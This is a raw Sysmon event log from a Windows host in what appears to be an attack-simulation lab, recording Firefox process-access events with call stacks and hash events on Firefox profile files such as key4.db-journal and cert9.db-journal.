Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+ca12c4|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|C:\Program Files\Mozilla Firefox\xul.dll+16d0278|C:\Program Files\Mozilla Firefox\xul.dll+1b6aed7|C:\Program Files\Mozilla Firefox\xul.dll+17876ff|C:\Program Files\Mozilla Firefox\xul.dll+17387a6|UNKNOWN(0000037E87991E84) 10341000x8000000000000000105219Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.662{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+ca12c4|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|C:\Program Files\Mozilla Firefox\xul.dll+16d0278|C:\Program Files\Mozilla Firefox\xul.dll+1b6aed7|C:\Program Files\Mozilla Firefox\xul.dll+17876ff|C:\Program Files\Mozilla Firefox\xul.dll+17387a6|UNKNOWN(0000037E87991E84) 10341000x8000000000000000105218Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.662{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+ca12c4|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|C:\Program Files\Mozilla Firefox\xul.dll+16d0278|C:\Program Files\Mozilla Firefox\xul.dll+1b6aed7|C:\Program Files\Mozilla Firefox\xul.dll+17876ff|C:\Program Files\Mozilla Firefox\xul.dll+17387a6|UNKNOWN(0000037E87991E84) 10341000x8000000000000000105217Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.662{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+ca12c4|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|C:\Program Files\Mozilla Firefox\xul.dll+16d0278|C:\Program Files\Mozilla Firefox\xul.dll+1b6aed7|C:\Program Files\Mozilla Firefox\xul.dll+17876ff|C:\Program Files\Mozilla Firefox\xul.dll+17387a6|UNKNOWN(0000037E87991E84) 10341000x8000000000000000105216Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.662{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+ca12c4|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|C:\Program Files\Mozilla Firefox\xul.dll+16d0278|C:\Program Files\Mozilla Firefox\xul.dll+1b6aed7|C:\Program Files\Mozilla Firefox\xul.dll+17876ff|C:\Program Files\Mozilla Firefox\xul.dll+17387a6|UNKNOWN(0000037E87991E84) 10341000x8000000000000000105215Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.662{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+ca12c4|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|C:\Program Files\Mozilla Firefox\xul.dll+16d0278|C:\Program Files\Mozilla Firefox\xul.dll+1b6aed7|C:\Program Files\Mozilla Firefox\xul.dll+17876ff|C:\Program Files\Mozilla Firefox\xul.dll+17387a6|UNKNOWN(0000037E87991E84) 10341000x8000000000000000105214Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.662{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+ca12c4|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|C:\Program Files\Mozilla Firefox\xul.dll+16d0278|C:\Program Files\Mozilla Firefox\xul.dll+1b6aed7|C:\Program Files\Mozilla Firefox\xul.dll+1b73e11|C:\Program Files\Mozilla Firefox\xul.dll+1d32fc7|UNKNOWN(0000037E87993E5F) 10341000x8000000000000000105213Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.662{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+ca12c4|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|C:\Program Files\Mozilla Firefox\xul.dll+16d0278|C:\Program Files\Mozilla Firefox\xul.dll+1b6aed7|C:\Program Files\Mozilla Firefox\xul.dll+1b73e11|C:\Program Files\Mozilla Firefox\xul.dll+1d32fc7|UNKNOWN(0000037E87993E5F) 10341000x8000000000000000105212Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.662{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+ca12c4|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|C:\Program Files\Mozilla Firefox\xul.dll+16d0278|C:\Program Files\Mozilla Firefox\xul.dll+1b6aed7|C:\Program Files\Mozilla Firefox\xul.dll+1b73e11|C:\Program Files\Mozilla Firefox\xul.dll+1d32fc7|UNKNOWN(0000037E87993E5F) 10341000x8000000000000000105211Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.662{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+ca12c4|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|C:\Program Files\Mozilla Firefox\xul.dll+16d0278|C:\Program Files\Mozilla Firefox\xul.dll+1b6aed7|C:\Program Files\Mozilla Firefox\xul.dll+1b5f88f|C:\Program Files\Mozilla Firefox\xul.dll+736f4|C:\Program Files\Mozilla Firefox\xul.dll+1256348|C:\Program Files\Mozilla Firefox\xul.dll+8b8f1|C:\Program Files\Mozilla Firefox\xul.dll+8b848|C:\Program Files\Mozilla Firefox\xul.dll+ac7489|C:\Program Files\Mozilla Firefox\xul.dll+87e1f|C:\Program Files\Mozilla Firefox\xul.dll+c386fb|C:\Program Files\Mozilla Firefox\xul.dll+16fdc02|C:\Program Files\Mozilla Firefox\xul.dll+129ca49|C:\Program Files\Mozilla Firefox\xul.dll+1b6c136|C:\Program Files\Mozilla Firefox\xul.dll+17876ff|C:\Program Files\Mozilla Firefox\xul.dll+17014f1 10341000x8000000000000000105210Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.662{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+ca12c4|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|C:\Program Files\Mozilla Firefox\xul.dll+16d0278|C:\Program Files\Mozilla Firefox\xul.dll+1b6aed7|C:\Program Files\Mozilla Firefox\xul.dll+1b5f88f|C:\Program Files\Mozilla Firefox\xul.dll+736f4|C:\Program Files\Mozilla Firefox\xul.dll+1256348|C:\Program Files\Mozilla Firefox\xul.dll+8b8f1|C:\Program Files\Mozilla Firefox\xul.dll+8b848|C:\Program Files\Mozilla Firefox\xul.dll+ac7489|C:\Program Files\Mozilla Firefox\xul.dll+87e1f|C:\Program Files\Mozilla Firefox\xul.dll+c386fb|C:\Program Files\Mozilla Firefox\xul.dll+16fdc02|C:\Program Files\Mozilla Firefox\xul.dll+129ca49|C:\Program Files\Mozilla Firefox\xul.dll+1b6c136|C:\Program Files\Mozilla Firefox\xul.dll+17876ff|C:\Program Files\Mozilla Firefox\xul.dll+17014f1 10341000x8000000000000000105209Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.662{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+ca12c4|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|C:\Program Files\Mozilla Firefox\xul.dll+16d0278|C:\Program Files\Mozilla Firefox\xul.dll+1b6aed7|C:\Program Files\Mozilla Firefox\xul.dll+1b5f88f|C:\Program Files\Mozilla Firefox\xul.dll+736f4|C:\Program Files\Mozilla Firefox\xul.dll+1256348|C:\Program Files\Mozilla Firefox\xul.dll+8b8f1|C:\Program Files\Mozilla Firefox\xul.dll+8b848|C:\Program Files\Mozilla Firefox\xul.dll+ac7489|C:\Program Files\Mozilla Firefox\xul.dll+87e1f|C:\Program Files\Mozilla Firefox\xul.dll+c386fb|C:\Program Files\Mozilla Firefox\xul.dll+16fdc02|C:\Program Files\Mozilla Firefox\xul.dll+129ca49|C:\Program Files\Mozilla Firefox\xul.dll+1b6c136|C:\Program Files\Mozilla Firefox\xul.dll+17876ff|C:\Program Files\Mozilla Firefox\xul.dll+17014f1 23542300x8000000000000000105208Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.609{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\ADMINI~1\AppData\Roaming\Mozilla\Firefox\Profiles\P09S3I~1.DEF\key4.db-journalMD5=8C60EC8EA0C8A7B614054040FB104BCE,SHA256=251D85522850AC5BC3D3CAFE90DD999F3A31774EFD703C569750F21A964C6EC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105207Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.593{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\ADMINI~1\AppData\Roaming\Mozilla\Firefox\Profiles\P09S3I~1.DEF\key4.db-journalMD5=8B98354B2F705C2C78D4EB735E4DFCC0,SHA256=3ADC99E91976C27668BC0622CB9E9DA0566AC8D988DAE4A9B724001339D51A06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105206Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.578{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\ADMINI~1\AppData\Roaming\Mozilla\Firefox\Profiles\P09S3I~1.DEF\cert9.db-journalMD5=FED732C829CD610B1E20072194E889BC,SHA256=2A2A1B1417A15535EAB463DADE9E86EC568BBBC8994540792985B24EBEAB930A,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000105205Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.578{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\ADMINI~1\AppData\Roaming\Mozilla\Firefox\Profiles\P09S3I~1.DEF\pkcs11.txt2021-10-04 07:58:30.578 23542300x8000000000000000105204Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.562{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89F2392527AA63286D6D4D83672BD3C0,SHA256=166F21CCB54142327BCE0360C157DEBFA0D0220CC60B7A6F01719FD5B277E679,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105203Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.531{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+bf7923|C:\Program Files\Mozilla Firefox\xul.dll+bf6fc1|C:\Program Files\Mozilla Firefox\xul.dll+beec83|C:\Program Files\Mozilla Firefox\xul.dll+bf8370|C:\Program Files\Mozilla Firefox\xul.dll+fc0059|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a|C:\Program Files\Mozilla Firefox\xul.dll+eb6c37|C:\Program Files\Mozilla Firefox\xul.dll+eb67ec|C:\Program Files\Mozilla Firefox\xul.dll+2b70e2|C:\Program Files\Mozilla Firefox\xul.dll+1ac273f|C:\Program Files\Mozilla Firefox\xul.dll+f1bcd0 10341000x8000000000000000105202Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.509{58E9C193-ACA7-615A-1400-00000000FC01}9401608C:\Windows\system32\svchost.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105201Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.509{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+3a7e21|C:\Program Files\Mozilla Firefox\xul.dll+3a79a4|C:\Program Files\Mozilla Firefox\xul.dll+3a7848|C:\Program Files\Mozilla Firefox\xul.dll+c0e190|C:\Program Files\Mozilla Firefox\xul.dll+c0db0d|C:\Program Files\Mozilla Firefox\xul.dll+c06ba4|C:\Program Files\Mozilla Firefox\xul.dll+c0c010|C:\Program Files\Mozilla Firefox\xul.dll+c0c76b|C:\Program Files\Mozilla Firefox\xul.dll+39ae11|C:\Program Files\Mozilla Firefox\xul.dll+c0d539|C:\Program Files\Mozilla Firefox\xul.dll+c104f2|C:\Program Files\Mozilla Firefox\xul.dll+c0cf56|C:\Program Files\Mozilla Firefox\xul.dll+39a61b|C:\Program Files\Mozilla Firefox\xul.dll+bedfc3|C:\Program Files\Mozilla Firefox\xul.dll+1f0f57c 10341000x8000000000000000105200Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.509{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+bf7923|C:\Program Files\Mozilla Firefox\xul.dll+bf6fc1|C:\Program Files\Mozilla Firefox\xul.dll+beec83|C:\Program Files\Mozilla Firefox\xul.dll+bf8370|C:\Program Files\Mozilla Firefox\xul.dll+fc0059|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a|C:\Program Files\Mozilla Firefox\xul.dll+eb6c37|C:\Program Files\Mozilla Firefox\xul.dll+eb67ec|C:\Program Files\Mozilla Firefox\xul.dll+2b70e2|C:\Program Files\Mozilla Firefox\xul.dll+eb5f76|C:\Program Files\Mozilla Firefox\xul.dll+eb5e89 10341000x8000000000000000105199Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.509{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+bf7923|C:\Program Files\Mozilla Firefox\xul.dll+bf6fc1|C:\Program Files\Mozilla Firefox\xul.dll+beec83|C:\Program Files\Mozilla Firefox\xul.dll+bf8370|C:\Program Files\Mozilla Firefox\xul.dll+fc0059|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a|C:\Program Files\Mozilla Firefox\xul.dll+eb6c37|C:\Program Files\Mozilla Firefox\xul.dll+eb67ec|C:\Program Files\Mozilla Firefox\xul.dll+2b70e2|C:\Program Files\Mozilla Firefox\xul.dll+eb5f76|C:\Program Files\Mozilla Firefox\xul.dll+eb5e89 10341000x8000000000000000105198Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.509{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+bf7923|C:\Program Files\Mozilla Firefox\xul.dll+bf6fc1|C:\Program Files\Mozilla Firefox\xul.dll+beec83|C:\Program Files\Mozilla Firefox\xul.dll+bf8370|C:\Program Files\Mozilla Firefox\xul.dll+fc0059|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a|C:\Program Files\Mozilla Firefox\xul.dll+eb6c37|C:\Program Files\Mozilla Firefox\xul.dll+eb67ec|C:\Program Files\Mozilla Firefox\xul.dll+2b70e2|C:\Program Files\Mozilla Firefox\xul.dll+eb5f76|C:\Program Files\Mozilla Firefox\xul.dll+eb5e89 10341000x8000000000000000105197Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.509{58E9C193-ACA7-615A-1400-00000000FC01}9401608C:\Windows\system32\svchost.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105196Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.509{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+bf7923|C:\Program Files\Mozilla Firefox\xul.dll+bf6fc1|C:\Program Files\Mozilla Firefox\xul.dll+beec83|C:\Program Files\Mozilla Firefox\xul.dll+bf8370|C:\Program Files\Mozilla Firefox\xul.dll+fc0059|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a|C:\Program Files\Mozilla Firefox\xul.dll+eb6c37|C:\Program Files\Mozilla Firefox\xul.dll+eb67ec|C:\Program Files\Mozilla Firefox\xul.dll+2b70e2|C:\Program Files\Mozilla Firefox\xul.dll+eb5f76|C:\Program Files\Mozilla Firefox\xul.dll+eb5e89 10341000x8000000000000000105195Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.509{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program 